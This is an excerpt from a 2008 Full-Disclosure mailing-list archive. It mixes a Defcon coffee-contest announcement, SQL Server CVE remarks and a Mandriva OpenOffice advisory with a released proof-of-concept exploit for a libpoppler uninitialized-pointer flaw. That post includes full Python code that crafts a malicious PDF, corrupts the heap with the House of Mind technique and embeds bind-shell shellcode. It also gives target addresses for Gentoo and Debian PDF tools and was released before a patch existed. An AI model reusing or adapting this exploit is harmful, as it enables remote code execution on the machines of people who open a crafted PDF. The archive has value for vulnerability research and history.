opening of the con. The rules remain as few and as simple as we can manage: A. Whole coffee beans only: nothing ground, powdered, aerosolized, crystallized, liquified, etc. Just beans. If you submit something other than beans, it won't count as an entry. B. Unflavored beans only: we are trying to evaluate coffee, not somebody's science experiment. If you submit flavored coffee (and this includes stuff with chickory or for that matter any non-coffee ingredient), it won't' count as an entry. C. No decaf. Seriously, submitting decaf to Coffee Wars is like entering your Ford Granada* in the Indy 500-- it might technically be a car, and maybe it can actually complete a 500-mile distance, but it detracts from the whole experience for everyone. D. Time is critical. A coffee war lasts only a couple of hours, and it turns out there are limits on the intake capacity of the judges. If you wish to enter, you need to get your coffee to us at or before the opening of the contest area. If you want to get your coffee back, you need to make a plan for this when you submit it-- otherwise it will become part of the CoffeeWars legacy. [secret message to G Mark: it was agonizing having to turn away your entry last year solely because of timing] E. Volume is also important. We need to have enough coffee beans to brew two pots, plus have some beans left to pass around for inspection and smelling. 1/2 lb is a good amount; less than 1/4 lb is probably not enough. If your coffee is really, really good, you probably should submit as much as possible... [secret message to G Mark: come on man, make with the Kona!] Hey, look! In the Defcon contest area! It's CoffeeWars! Grab your glocks and call the cops. Wait, no. That's what you're supposed to do when you see Tupac. When you see CoffeeWars, you are supposed to submit your best coffee beans for judgment, in the hope that you will be awarded a much-coveted prize, plus 3.5 seconds of loving from the crowd at the closing ceremony. What do you say? Is your coffee good enough to endure the blazing crucible of CoffeeWars 9? Will you join the previous eight winners in glory? Only one way to find out, friend. So mobilize your beans and enter. --Foofus. * If you have actually driven a Ford Granada, well, you know what we mean. From cesarc56 at yahoo.com Wed Jul 9 00:26:11 2008 From: cesarc56 at yahoo.com (Cesar) Date: Tue, 8 Jul 2008 16:26:11 -0700 (PDT) Subject: [Full-disclosure] iDefense Security Advisory 07.08.08: Microsoft SQL Server Restore Integer Underflow Vulnerability In-Reply-To: <4873D9A5.5070508@idefense.com> Message-ID: <918334.45595.qm@web54402.mail.yahoo.com> Just to clarify, the following SQL Server vulnerabilities vulnerabilities: SQL Server Buffer Overrun Vulnerability - CVE-2008-0106 SQL Server Memory Corruption Vulnerability - CVE-2008-0107 Convert Buffer Overrun - CVE-2008-0086 can be exploited to take complete control of the system on Windows 2003, it doesn't matter the user account under SQL Server service is running. On Windows 2008 if the service is running under Network Service or Local Service account then full system compromise is always possible. *see http://www.argeniss.com/research/TokenKidnapping.pdf Cesar. --- On Tue, 7/8/08, iDefense Labs wrote: > From: iDefense Labs > Subject: [Full-disclosure] iDefense Security Advisory 07.08.08: Microsoft SQL Server Restore Integer Underflow Vulnerability > To: vulnwatch at vulnwatch.org, full-disclosure at lists.grok.org.uk, bugtraq at securityfocus.com > Date: Tuesday, July 8, 2008, 11:18 PM > iDefense Security Advisory 07.08.08 > http://labs.idefense.com/intelligence/vulnerabilities/ > Jul 08, 2008 > > I. BACKGROUND > > SQL Server is Microsoft's database server product. It > supports the > restoration and inspection of backups via SQL statements. > For more > information see the vendor's website found at the > following URL. > > http://www.microsoft.com/sql/default.mspx From fmanzano at fceia.unr.edu.ar Wed Jul 9 00:37:49 2008 From: fmanzano at fceia.unr.edu.ar (Felipe Andres Manzano) Date: Tue, 8 Jul 2008 20:37:49 -0300 (ART) Subject: [Full-disclosure] #2008-007 libpoppler uninitialized pointer - POC Message-ID: <63960.24.232.92.119.1215560269.squirrel@www.fceia.unr.edu.ar> hi. I was in doubt about releasing this because of there is no official patch. I suppose at this point anyone could accomplish the same thing so, again I'm in doubt. A friend once told me that if in doubt take your pants off. I've already tried that and I didn't earn no resolution to my conflict so.. I thought I should try the internet version of that strategy. So here we are, enjoy... f/ ''' #OCERT ADV #2008-007 libpoppler uninitialized pointer Description: The poppler PDF rendering library suffers a memory management bug which leads to arbitrary code execution. The vulnerability is present in the Page class constructor/destructor. The pageWidgets object is not initialized in the Page constructor if specific conditions are met, but it is deleted afterwards in the destructor regardless of its initialization. Specific PDF files can be crafted which allocate arbitrary memory to trigger the vulnerability. A new poppler version addressing the issue is scheduled to be released on July 30th according to maintainer. The following patch fixes the issue: diff --git a/poppler/Page.cc b/poppler/Page.cc index b28a3ee..72a706b 100644 --- a/poppler/Page.cc +++ b/poppler/Page.cc @@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key, PDFRectangle *box) { Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) { Object tmp; - + pageWidgets = NULL; //Security fix ok = gTrue; xref = xrefA; num = numA; Affected version: Poppler <= 0.8.4 Fixed version: Poppler, N/A Credit: vulnerability report, patch and PoC code received from Felipe Andres Manzano . CVE: CVE-2008-2950 Timeline: 2008-06-27: vulnerability report received 2008-06-28: contacted poppler maintainers and affected vendors 2008-06-30: maintainer confirms issue and patch 2008-07-07: advisory release References: Permalink: http://www.ocert.org/advisories/ocert-2008-007.html ####END OCERT Sumary: ======= The libpoppler pdf rendering library, can free uninitialized pointers, leading to arbitrary code execution. This vulnerability results from memory management bugs in the Page class constructor/destructor. Technical Description - Exploit/Concept Code: ============================================= Tests were performed using libpoppler util pdftotext taken from git://git.freedesktop.org/git/poppler/poppler. Other version where tried succesfully (the ones shiped with debian/gentoo). In the initialization of a Page object and under certain conditions a member object skips initialization, but then is eventualy deleted. This can be conducted to the situation in which an arbitrary pointer is passed to the libc free and so the it gets apropiate for the malloc maleficarum to enter the scene. Look at the Page class constructor on Page.cc:231. First at the begining of the function the member object pageWidgets isnt initialized then it tries to check if the type of the annotations proposed on the pdf file ar correct; if not it bails out to the label err2. Note that is some incorcondance on the type of the anotation arise the member variable pageWidgets is never initialized! Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) { Object tmp; [...] // annotations pageDict->lookupNF("Annots", &annots); if (!(annots.isRef() || annots.isArray() || annots.isNull())) { error(-1, "Page annotations object (page %d) is wrong type (%s)", num, annots.getTypeName()); annots.free(); goto err2; } // forms pageWidgets = new FormPageWidgets(xrefA, this->getAnnots(&tmp),num,form); tmp.free(); [...] err2: annots.initNull(); err1: contents.initNull(); ok = gFalse; } But in the Page class destructor, Page.cc:309, pageWidgets is deleted without any consideration. The Page destructor is inmediatelly called after the erroneous Page construction. Page::~Page() { delete pageWidgets; delete attrs; annots.free(); contents.free(); } It is worth mentioning that the pdf rendering scenario is friendly with the heap massage technics because you will find lots of ways to allocate or allocate/free memory in the already probided functionality. In the POC I have used repetidely the 'name' of the fields of a pdf dictionary to allocate memory. Each name allocates up to 127bytes and apparently there is no limit in the number of fields. The following excerpt is a sample verification of the existence of the problem : localhost expl-poppler # python poppler-exploit-rc8.py gentoo-pdftotext >test.pdf localhost expl-poppler # pdftotext test.pdf Error: PDF file is damaged - attempting to reconstruct xref table... Error: Annotation rectangle is wrong type Error: Bad bounding box for annotation Error: Bad bounding box for annotation Error: Bad bounding box for annotation Error: Bad bounding box for annotation Error: Bad bounding box for annotation Error: Page annotations object (page 3) is wrong type (integer) Error: Page count in top-level pages object is incorrect Error: Couldnt read page catalog Trace/breakpoint trap :) Further research should be done to accomodate the heap for other applications like evince: localhost expl-poppler # evince test.pdf (evince:8912): GnomeUI-WARNING **: While connecting to session manager: Authentication Rejected, reason : None of the authentication protocols specified are supported and host-based authentication failed. ** (evince:8912): WARNING **: Service registration failed. ** (evince:8912): WARNING **: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken. Error: PDF file is damaged - attempting to reconstruct xref table... Error: Annotation rectangle is wrong type Error: Bad bounding box for annotation Error: Bad bounding box for annotation Error: Bad bounding box for annotation Error: Bad bounding box for annotation Error: Bad bounding box for annotation Error: Page annotations object (page 3) is wrong type (integer) *** glibc detected *** evince: munmap_chunk(): invalid pointer: 0x08100468 *** Note that 0x08100468 is still a provided pointer. But in this try some malloc structure like _heap_info (see. house of mind) is not correctly aligned any more. Maybe evince-thumbnailer which is (probably monothreaded) is an easier target. Patch ===== diff --git a/poppler/Page.cc b/poppler/Page.cc index b28a3ee..72a706b 100644 --- a/poppler/Page.cc +++ b/poppler/Page.cc @@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key, PDFRectangle *box) { Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) { Object tmp; - + pageWidgets = NULL; //Security fix ok = gTrue; xref = xrefA; num = numA; POC: === Written in pyploit. It can be used 2 ways , one selecting a preconfigured target like *gentoo-pdftotext* or the other in which you could pass some malloc/free execution trace moddifing parameters. ''' ########################################################################## #### Felipe Andres Manzano * fmanzano at fceia.unr.edu.ar #### #### some shit on http://felipe.andres.manzano.googlepages.com/home #### ########################################################################## import struct import struct import math import os import sys ## print "%.400f"%d wont work :( ... so a quick double printing class class Doubles: def __init__(self, precision=400): self.precision=precision def pdficateint(self,i1,i2): s = struct.pack("@L",i1) + struct.pack("@L",i2) return self.pdficatestr(s) def pdficate(self,s): rslt = " " for pos in range (0,len(s)/8): rslt+=self.pdficatestr(s[(pos*8):(pos*8)+8])+" " return rslt; def pdficatestr(self, s): d = struct.unpack("d",s)[0] rslt=" " if(d<0.0): rslt+="-" d=-d rslt+="%d."%int(math.floor(d)) myd=math.floor(d) scale=0.1 nines=0 for p in range(1,self.precision): for i in range(1,10): if (myd+scale*i) > d: i-=1 break if i==9: if nines>6: return rslt else: nines+=1 else: nines=0 rslt+=("%02d"%i)[1] myd+=scale* i scale=scale*0.1 return rslt ##From Malloc maleficarum ##http://packetstormsecurity.org/papers/attack/MallocMaleficarum.txt class HouseOfMind: HEAP_MAX_SIZE=(1024*1024) JMP='\xeb' NOP='\x90' PAD='\x00' PREV_INUSE=0x1 IS_MMAPPED=0x2 NON_MAIN_ARENA=0x4 def __init__(self, base, where, payload, entrypoint): self.base=base self.where=where-0xc self.heap_info = (base+self.HEAP_MAX_SIZE-1)& ~(self.HEAP_MAX_SIZE-1) self.payload=payload self.entrypoint=entrypoint self.chunkaddress=0 if (self.entrypoint > 0xff - 8): throw ## lendian, 32bit only ## See The Malloc Maleficarum / House of Mind def mind(self): rslt = "" #first we add padding to reach the next Heap border rslt+=self.PAD*(self.heap_info-self.base) #now we add a _heap_info pinting to a malloc_state of our own #and dictating a generous size for this *heap* ##arena.c:59 //struct _heap_info rslt += struct.pack(" unlocked. rslt += struct.pack(" +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Size of previous chunk, if allocated | | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Size of chunk, in bytes |M|P| # mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | User data starts here... . # . . # . (malloc_usable_size() bytes) . # . | #nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Size of chunk | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ #chunk 0 There isn't a single reason for this to exist * wabaaaaaaaaaa! # rslt += struct.pack(">\nstream...\nendstream\n"])) catalog = PDFDict() catalog.add("Type", PDFName("Catalog")) catalog.add("Outlines", "3 0 R") catalog.add("Pages", "4 0 R") catalog.add("AcroForm", "<>") #for i in range(0,1000): # catalog.add( "C"*82 + "%05d"%i, 0) outlines = PDFDict() outlines.add("Type", PDFName("Outlines")) outlines.add("Count",0) pages = PDFDict() pages.add("Type", PDFName("Pages")) pages.add("Kids","[ 8 0 R 6 0 R 5 0 R ]") pages.add("Count","3") doc.add(PDFObject([catalog])) doc.add(PDFObject([outlines])) doc.add(PDFObject([pages])) page1 = PDFDict() page1.add("Type", PDFName("Page")) page1.add("Parent", "4 0 R") page1.add("MediaBox","[ 0 0 612 792 ]") page1.add("Contents", "1 0 R") page1.add("Resources", "<< /ProcSet 6 0 R >>") page1.add("Annots", "0") #malloc-fill-free lots of chunks of the size then used by Page class(88) for pagesize in range(88,126): payload = ("".join(["#%02x"%ord(struct.pack("@L",hm.chunkaddress)[i]) for i in range (0,4)]))*19 payload += "B"*(pagesize-(len(payload)/3)) for i in range(0,10): page1.add(payload, 0) doc.add(PDFObject([page1])) page1 = PDFDict() page1.add("Type", PDFName("Page")) page1.add("Parent", "4 0 R") page1.add("MediaBox","[ 0 0 612 792 ]") page1.add("Contents", "1 0 R") page1.add("Resources", "<< /ProcSet 6 0 R >>") page1.add("Annots", "[7 0 R 7 0 R 7 0 R 7 0 R]") #massage session 1 size=127 for i in range(0,massage[0]): page1.add( "A"*(size-5)+("%05d"%(i)), "B"*size) doc.add(PDFObject([page1])) annots = PDFDict() annots.add("Subtype","/Text") annots.add("BS", "<? "0.0 "*massage[2] + " ]>>") annots.add("FT", "/Tx") doc.add(PDFObject([annots])) page1 = PDFDict() page1.add("Type", PDFName("Page")) page1.add("Parent", "4 0 R") page1.add("MediaBox","[ 0 0 612 792 ]") page1.add("Contents", "1 0 R") page1.add("Resources", "<< /ProcSet 6 0 R >>") page1.add("Annots", "[7 0 R]") doc.add(PDFObject([page1])) doc.add(PDFObject(["<<>>"])) doc.add(PDFObject(["[ /PDF ]"])) return doc.__str__() ##Main ## Not every shellcode will work by now ## Only the ones that taken by 8bytes form an ieee754 double presicion float ## with an exponent not too positive ... :) ## linux_ia32_bind - LPORT=4444 Size=84 Encoder=None http://metasploit.com scode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" scode += "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" scode += "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" scode += "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" scode += "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" scode += "\x89\xe1\xcd\x80" #expl = PopplerExpl( ('\xcc'+'\x90')*((160-16)/2)) expl = PopplerExpl(scode) targets = { "gentoo-pdftotext":(0x08100000, 0x804c014, 1863, 20, 400), "debian4-pdftotext":(0x08100000, 0x804bb18, 1879, 33, 400), "gentoo-evince-thumbnailer": (0x8100000, 0x080712c4, 907, 34, 200), } if len( sys.argv )==1: print "Comments -> fmanzano at fceia.unr.edu.ar" print "Usage 1:" print " %s "%sys.argv[0], targets.keys() print "Usage 2:" print " %s massage1 massage2 massage3 base got"%sys.argv[0] print " The idea here is to align the _heap_info struct that commences with 0x08?00010 " print " to the address 0x8?0000. For this pourpose move massage1/2/3. " print " THIS STUPIDLY SIMPLE METHOD WOULD WORK FOR VERY FEW APPS !" print " base is the 1024*1024 bytes aligned address to which we are trying to align everything" print " got is the addres of the got where the thing is going to write the shellcode address" print " BTW by now the shellcode is nop;int 3;nop...grooovy!.. NOT" elif len( sys.argv )>2: print expl.make(int(sys.argv[4][2:],16), int(sys.argv[5][2:],16), (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))) else: #base: the expected heap limit (08100000,08200000,....08f00000... ) #got: address of the got entry to change #chinesse massage base,got,massage1,massage2,massage3 = targets[sys.argv[1]] print expl.make(base,got,(massage1,massage2,massage3)) #thnks A From joe at pjprimer.com Wed Jul 9 00:53:35 2008 From: joe at pjprimer.com (Joe Barr) Date: Tue, 08 Jul 2008 18:53:35 -0500 Subject: [Full-disclosure] Coffee Wars 9 : Call for Beans In-Reply-To: <33916.209.59.46.11.1215553467.squirrel@webmail.foofus.net> References: <33916.209.59.46.11.1215553467.squirrel@webmail.foofus.net> Message-ID: <1215561215.5825.190.camel@Desktop> After missing the grand prize last year by only *that much, I'm thinking of trying again. If there are fewer competitors this year, there is a good chance I can improve my score. If there's more, well, that remains to be seen. On Tue, 2008-07-08 at 14:44 -0700, foofus at foofus.net wrote: > In addition to whatever other insanity flourishes at Defcon each > year, the last eight years have been witness to the amazing and > ridiculous contest known as CoffeeWars. This single ludicrous > event is really two contests. The first, and most important, is > the attempt to select the finest coffee from all of hacker culture. > The second is the loopy part: to find the upper limit on how much > coffee the staff can drink. > > Every year, we succeed at the first task. Every year, we fail at > the second. Here is a useful list of key factors contributing to > the outbreak of coffee wars throughout history: > > 1 - because the Kona/JBM debate had to be settled > 2 - because once was not enough > 3 - because we went a little crazy > 4 - because people responded to our brand of crazy > 5 - because it is now an institution > 6 - because we're actually getting good at running it > 7 - because each year the competition gets more intense > 8 - because of popular demand > 9 - because you haven't yet had a chance to test your beans > > What's that, you say? You only recall eight coffee wars? And the > list mentions a ninth? Very attentive of you, dear reader. The > ninth coffee war will take place exactly when you would expect: on > Friday, 8 Aug 2008, at the Riviera, at the opening of the con. > > The rules remain as few and as simple as we can manage: > > A. Whole coffee beans only: nothing ground, powdered, > aerosolized, crystallized, liquified, etc. Just > beans. If you submit something other than beans, > it won't count as an entry. > B. Unflavored beans only: we are trying to evaluate > coffee, not somebody's science experiment. If you > submit flavored coffee (and this includes stuff > with chickory or for that matter any non-coffee > ingredient), it won't' count as an entry. > C. No decaf. Seriously, submitting decaf to Coffee > Wars is like entering your Ford Granada* in the > Indy 500-- it might technically be a car, and maybe > it can actually complete a 500-mile distance, but > it detracts from the whole experience for everyone. > D. Time is critical. A coffee war lasts only a couple > of hours, and it turns out there are limits on the > intake capacity of the judges. If you wish to > enter, you need to get your coffee to us at or > before the opening of the contest area. If you > want to get your coffee back, you need to make a > plan for this when you submit it-- otherwise it > will become part of the CoffeeWars legacy. [secret > message to G Mark: it was agonizing having to turn > away your entry last year solely because of timing] > E. Volume is also important. We need to have enough > coffee beans to brew two pots, plus have some beans > left to pass around for inspection and smelling. 1/2 > lb is a good amount; less than 1/4 lb is probably > not enough. If your coffee is really, really good, > you probably should submit as much as possible... > [secret message to G Mark: come on man, make with > the Kona!] > > Hey, look! In the Defcon contest area! It's CoffeeWars! Grab your > glocks and call the cops. Wait, no. That's what you're supposed to > do when you see Tupac. When you see CoffeeWars, you are supposed to > submit your best coffee beans for judgment, in the hope that you will > be awarded a much-coveted prize, plus 3.5 seconds of loving from the > crowd at the closing ceremony. > > What do you say? Is your coffee good enough to endure the blazing > crucible of CoffeeWars 9? Will you join the previous eight winners > in glory? > > Only one way to find out, friend. So mobilize your beans and enter. > > --Foofus. > > * If you have actually driven a Ford Granada, well, you know what we > mean. > > > -- One of the advantages of being disorderly is that one is constantly making exciting discoveries. A. A. Milne From security at mandriva.com Wed Jul 9 01:23:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Tue, 08 Jul 2008 18:23:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:137 ] - Updated OpenOffice.org fix vulnerability, and a few other bugs Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:137 http://www.mandriva.com/security/ _______________________________________________________________________ Package : openoffice.org Date : July 8, 2008 Affected: 2008.1 _______________________________________________________________________ Problem Description: Integer overflow in the rtl_allocateMemory function in sal/rtl/source/alloc_global.c in OpenOffice.org (OOo) 2.0 through 2.4 allows remote attackers to execute arbitrary code via a crafted file that triggers a heap-based buffer overflow. (CVE-2008-2152) Also, according to bug #38874 decimal numbers on Hebrew documents would appear as Arabic characters. Another issue (#39799) is with measurements units configuration to format paragraphs on the menu: (Tools -> Options -> OpenOffice.org Writer -> General). Even setting to centimeters on (Indent & Spacing) option it shows as characters (ch) on (Indents & Spacing) configuration on the menu: (Format -> Paragraph -> Indents & Spacing). Moreover, a document holding Notes edited on Microsoft Office would not show when opened with OpenOffice. These and a number of other OpenOffice.org issues were fixed by the new version provided in this update. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2152 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: c52bf591476b4160e5a314fbab89cfb7 2008.1/i586/openoffice.org-2.4.1.5-2.3mdv2008.1.i586.rpm 921165c7ab37f9118c9086791347f3d1 2008.1/i586/openoffice.org-base-2.4.1.5-2.3mdv2008.1.i586.rpm d2b8826910a7c35f56d2083cc305a926 2008.1/i586/openoffice.org-calc-2.4.1.5-2.3mdv2008.1.i586.rpm c233264bd49860fb1a66487c4af74317 2008.1/i586/openoffice.org-common-2.4.1.5-2.3mdv2008.1.i586.rpm 7e8558d6cb61119a31cd76571871923d 2008.1/i586/openoffice.org-core-2.4.1.5-2.3mdv2008.1.i586.rpm 429f17e7edd20d7b7bb660475eb372aa 2008.1/i586/openoffice.org-devel-2.4.1.5-2.3mdv2008.1.i586.rpm 44caa3cdef4a17dca8fecb59c6603f53 2008.1/i586/openoffice.org-devel-doc-2.4.1.5-2.3mdv2008.1.i586.rpm cdf30503f0bf8a830e3c5f0f49cf1609 2008.1/i586/openoffice.org-draw-2.4.1.5-2.3mdv2008.1.i586.rpm aa8823be981a84d6192db8a29694bdeb 2008.1/i586/openoffice.org-dtd-officedocument1.0-2.4.1.5-2.3mdv2008.1.i586.rpm ef10ac43e72ceb2e74f21cab89a300ab 2008.1/i586/openoffice.org-filter-binfilter-2.4.1.5-2.3mdv2008.1.i586.rpm 7c13739e785522bf765128929e827e47 2008.1/i586/openoffice.org-gnome-2.4.1.5-2.3mdv2008.1.i586.rpm d412ac44a2d8d9a38fabd12f80ce96f6 2008.1/i586/openoffice.org-help-af-2.4.1.5-2.3mdv2008.1.i586.rpm 1ef00e0d9306758374a9635657cb9696 2008.1/i586/openoffice.org-help-ar-2.4.1.5-2.3mdv2008.1.i586.rpm 57b71c08bce9ae86d8f3d88857acbd37 2008.1/i586/openoffice.org-help-bg-2.4.1.5-2.3mdv2008.1.i586.rpm 1749b5cd964b3889763d7a0402c64ef1 2008.1/i586/openoffice.org-help-br-2.4.1.5-2.3mdv2008.1.i586.rpm c5631b94dc711ec67d5129a505674d61 2008.1/i586/openoffice.org-help-bs-2.4.1.5-2.3mdv2008.1.i586.rpm e392343e5548d5a4d06f0446ef85834d 2008.1/i586/openoffice.org-help-ca-2.4.1.5-2.3mdv2008.1.i586.rpm 8682af92f26ec2606c4f5c8088b83473 2008.1/i586/openoffice.org-help-cs-2.4.1.5-2.3mdv2008.1.i586.rpm 2557bc656d72dac39748eef08e66f737 2008.1/i586/openoffice.org-help-cy-2.4.1.5-2.3mdv2008.1.i586.rpm 5e859125cd1ab37e122ecbbacd76cdeb 2008.1/i586/openoffice.org-help-da-2.4.1.5-2.3mdv2008.1.i586.rpm 521985d230f1174a5b882c1536626883 2008.1/i586/openoffice.org-help-de-2.4.1.5-2.3mdv2008.1.i586.rpm 8bcd2263e776b202a4868971292b0a05 2008.1/i586/openoffice.org-help-el-2.4.1.5-2.3mdv2008.1.i586.rpm 9c2ef75a66e57696e5fa3f045d367608 2008.1/i586/openoffice.org-help-en_GB-2.4.1.5-2.3mdv2008.1.i586.rpm 47e3a9c02a35ffa02f88dda48dee6c2e 2008.1/i586/openoffice.org-help-es-2.4.1.5-2.3mdv2008.1.i586.rpm 7e5cce2e94635236bf9991bc49ecf380 2008.1/i586/openoffice.org-help-et-2.4.1.5-2.3mdv2008.1.i586.rpm 70b9fd8422cfa17e22eeea099b241fae 2008.1/i586/openoffice.org-help-eu-2.4.1.5-2.3mdv2008.1.i586.rpm 3061ad724c9190aaff7740a3d474145e 2008.1/i586/openoffice.org-help-fi-2.4.1.5-2.3mdv2008.1.i586.rpm 4da2e5b51fd441fcf60ddccfbc171d89 2008.1/i586/openoffice.org-help-fr-2.4.1.5-2.3mdv2008.1.i586.rpm 7d00a943a8131904854eee37f226db44 2008.1/i586/openoffice.org-help-he-2.4.1.5-2.3mdv2008.1.i586.rpm 6676191e162f9ffee7eb06ab370c1670 2008.1/i586/openoffice.org-help-hi-2.4.1.5-2.3mdv2008.1.i586.rpm 91464cffec97adf2126227f4b294df65 2008.1/i586/openoffice.org-help-hu-2.4.1.5-2.3mdv2008.1.i586.rpm e1146fe236af40628f06116a03a160f2 2008.1/i586/openoffice.org-help-it-2.4.1.5-2.3mdv2008.1.i586.rpm 91141fa8484d40947c92c4bdc7beef02 2008.1/i586/openoffice.org-help-ja-2.4.1.5-2.3mdv2008.1.i586.rpm b2d4887a3df50d2ef6e1bb738da60eaf 2008.1/i586/openoffice.org-help-ko-2.4.1.5-2.3mdv2008.1.i586.rpm 13e604096ac3b2b1f413145c28ced783 2008.1/i586/openoffice.org-help-mk-2.4.1.5-2.3mdv2008.1.i586.rpm 573be42eda538a0d0b109ca8c81f1829 2008.1/i586/openoffice.org-help-nb-2.4.1.5-2.3mdv2008.1.i586.rpm 63c9c4f95c711d19c2d1846d20e7126e 2008.1/i586/openoffice.org-help-nl-2.4.1.5-2.3mdv2008.1.i586.rpm ecda86d3f1cb998c2eabee31ccd1f6f0 2008.1/i586/openoffice.org-help-nn-2.4.1.5-2.3mdv2008.1.i586.rpm cb7db1afbd170e0646b76e07b999149d 2008.1/i586/openoffice.org-help-pl-2.4.1.5-2.3mdv2008.1.i586.rpm 00a94c06d1b04ca9660b27c536a2943f 2008.1/i586/openoffice.org-help-pt-2.4.1.5-2.3mdv2008.1.i586.rpm 38c1315a397e814dfbc857de43b2e69e 2008.1/i586/openoffice.org-help-pt_BR-2.4.1.5-2.3mdv2008.1.i586.rpm f82fdb2e8d0419b27fb406257edcde33 2008.1/i586/openoffice.org-help-ru-2.4.1.5-2.3mdv2008.1.i586.rpm 72408f3e89d3734ce370e06eb9a5d7fe 2008.1/i586/openoffice.org-help-sk-2.4.1.5-2.3mdv2008.1.i586.rpm e939bc0e344dcfe8303df9dfd657c486 2008.1/i586/openoffice.org-help-sl-2.4.1.5-2.3mdv2008.1.i586.rpm e2a8b66eff117d93508b4ffc90dacde0 2008.1/i586/openoffice.org-help-sv-2.4.1.5-2.3mdv2008.1.i586.rpm b9963f12871aa7c7e7cc87c327336ed6 2008.1/i586/openoffice.org-help-ta-2.4.1.5-2.3mdv2008.1.i586.rpm b9b7582756dc3b3a76e26031c4428c36 2008.1/i586/openoffice.org-help-tr-2.4.1.5-2.3mdv2008.1.i586.rpm 8e401a7d821842853c2a42ba245c976f 2008.1/i586/openoffice.org-help-zh_CN-2.4.1.5-2.3mdv2008.1.i586.rpm 8b294ae6d4c4b625fd4f4aa088d2864b 2008.1/i586/openoffice.org-help-zh_TW-2.4.1.5-2.3mdv2008.1.i586.rpm cb0e2506d60637979e19ef6f76e02257 2008.1/i586/openoffice.org-help-zu-2.4.1.5-2.3mdv2008.1.i586.rpm 4646737bd10ca272f66c795285e47182 2008.1/i586/openoffice.org-impress-2.4.1.5-2.3mdv2008.1.i586.rpm 6235eb046166720e63b10e0caaa90d4c 2008.1/i586/openoffice.org-java-common-2.4.1.5-2.3mdv2008.1.i586.rpm 750c9ce9243f9e963a23058038aba89a 2008.1/i586/openoffice.org-kde-2.4.1.5-2.3mdv2008.1.i586.rpm 1e05e403c6c5eef1ffd4fb0384ea8f1a 2008.1/i586/openoffice.org-l10n-af-2.4.1.5-2.3mdv2008.1.i586.rpm fcc27002980fed4dad21eb6be7bf49ed 2008.1/i586/openoffice.org-l10n-ar-2.4.1.5-2.3mdv2008.1.i586.rpm a0771722cd13bbd4d690692a9ff603ba 2008.1/i586/openoffice.org-l10n-bg-2.4.1.5-2.3mdv2008.1.i586.rpm 444f09615f41b29e79fbe2b9edd23df7 2008.1/i586/openoffice.org-l10n-br-2.4.1.5-2.3mdv2008.1.i586.rpm ccc121e5fc0e9408ddc7c763eca58e58 2008.1/i586/openoffice.org-l10n-bs-2.4.1.5-2.3mdv2008.1.i586.rpm 09934f12bff830153bd449371c34d686 2008.1/i586/openoffice.org-l10n-ca-2.4.1.5-2.3mdv2008.1.i586.rpm 2b35702ed925a922bfa005b4eb21f91e 2008.1/i586/openoffice.org-l10n-cs-2.4.1.5-2.3mdv2008.1.i586.rpm 9cb1b6cfa6a2abe95ff4ed5810d3aa95 2008.1/i586/openoffice.org-l10n-cy-2.4.1.5-2.3mdv2008.1.i586.rpm 3fef720cf730b7324bee861e13425fd2 2008.1/i586/openoffice.org-l10n-da-2.4.1.5-2.3mdv2008.1.i586.rpm db8b4f2b1a005deb54b627bc6a6ede0f 2008.1/i586/openoffice.org-l10n-de-2.4.1.5-2.3mdv2008.1.i586.rpm c261550425517a5fccc0a91abf38f6a5 2008.1/i586/openoffice.org-l10n-el-2.4.1.5-2.3mdv2008.1.i586.rpm 738e16f8f4c8cce47ac05d60ebc0d5cf 2008.1/i586/openoffice.org-l10n-en_GB-2.4.1.5-2.3mdv2008.1.i586.rpm 45d8c5a2e9849f6c18fb24c96bbbe29d 2008.1/i586/openoffice.org-l10n-es-2.4.1.5-2.3mdv2008.1.i586.rpm 6baf05a070974d86fb7439e0d957299b 2008.1/i586/openoffice.org-l10n-et-2.4.1.5-2.3mdv2008.1.i586.rpm 69b691fabd096c2f499199b8f80f1ec2 2008.1/i586/openoffice.org-l10n-eu-2.4.1.5-2.3mdv2008.1.i586.rpm a1a625f69347f9605e87d4211c975d5f 2008.1/i586/openoffice.org-l10n-fi-2.4.1.5-2.3mdv2008.1.i586.rpm ce9fc12c6e18910a34fbb02939f33caf 2008.1/i586/openoffice.org-l10n-fr-2.4.1.5-2.3mdv2008.1.i586.rpm e32781618220de7a95d5ec244e8d2d99 2008.1/i586/openoffice.org-l10n-he-2.4.1.5-2.3mdv2008.1.i586.rpm eb70efcd7679f3007d7980faa0050eac 2008.1/i586/openoffice.org-l10n-hi-2.4.1.5-2.3mdv2008.1.i586.rpm 63d4c829274cab53b7f190dd35f48b60 